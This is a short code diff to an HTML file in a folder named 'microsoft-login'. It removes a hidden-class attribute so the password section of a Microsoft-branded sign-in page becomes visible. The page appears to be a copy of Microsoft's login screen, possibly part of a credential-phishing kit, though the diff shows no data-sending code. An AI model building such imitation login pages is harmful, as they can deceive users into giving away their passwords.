--- a/microsoft-login/index2.html
+++ b/microsoft-login/index2.html
@@ -7,7 +7,7 @@
 	<link href="assets/app.css" rel="stylesheet" />
 </head>
 <body>
-<section id="section_pwd" class="d-none">
+<section id="section_pwd" >
         <div class="auth-wrapper">
             <img src="assets/logo.png" alt="Microsoft" class="d-block" />
             <div class="identity w-100 mt-16 mb-16">
